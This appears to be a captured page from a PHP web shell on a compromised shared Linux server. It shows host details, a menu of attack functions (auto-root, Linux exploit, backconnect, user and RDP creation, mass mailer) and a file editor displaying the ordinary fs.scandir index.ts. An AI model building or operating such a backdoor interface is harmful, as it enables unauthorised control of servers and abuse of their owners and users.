Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@nodelib /
fs.scandir /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
adapters
[ DIR ]
drwxr-xr-x
providers
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
constants.ts
629
B
-rw-r--r--
index.spec.ts
2
KB
-rw-r--r--
index.ts
1.58
KB
-rw-r--r--
settings.spec.ts
940
B
-rw-r--r--
settings.ts
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.ts
import { FileSystemAdapter } from './adapters/fs'; import * as async from './providers/async'; import * as sync from './providers/sync'; import Settings, { Options } from './settings'; import { Dirent, Entry } from './types'; type AsyncCallback = async.AsyncCallback; function scandir(path: string, callback: AsyncCallback): void; function scandir(path: string, optionsOrSettings: Options | Settings, callback: AsyncCallback): void; function scandir(path: string, optionsOrSettingsOrCallback: Options | Settings | AsyncCallback, callback?: AsyncCallback): void { if (typeof optionsOrSettingsOrCallback === 'function') { return async.read(path, getSettings(), optionsOrSettingsOrCallback); } async.read(path, getSettings(optionsOrSettingsOrCallback), callback as AsyncCallback); } // https://github.com/typescript-eslint/typescript-eslint/issues/60 // eslint-disable-next-line no-redeclare declare namespace scandir { function __promisify__(path: string, optionsOrSettings?: Options | Settings): Promise<Entry[]>; } function scandirSync(path: string, optionsOrSettings?: Options | Settings): Entry[] { const settings = getSettings(optionsOrSettings); return sync.read(path, settings); } function getSettings(settingsOrOptions: Settings | Options = {}): Settings { if (settingsOrOptions instanceof Settings) { return settingsOrOptions; } return new Settings(settingsOrOptions); } export { scandir, scandirSync, Settings, // https://github.com/typescript-eslint/typescript-eslint/issues/131 // eslint-disable-next-line no-undef AsyncCallback, Dirent, Entry, FileSystemAdapter, Options };
Close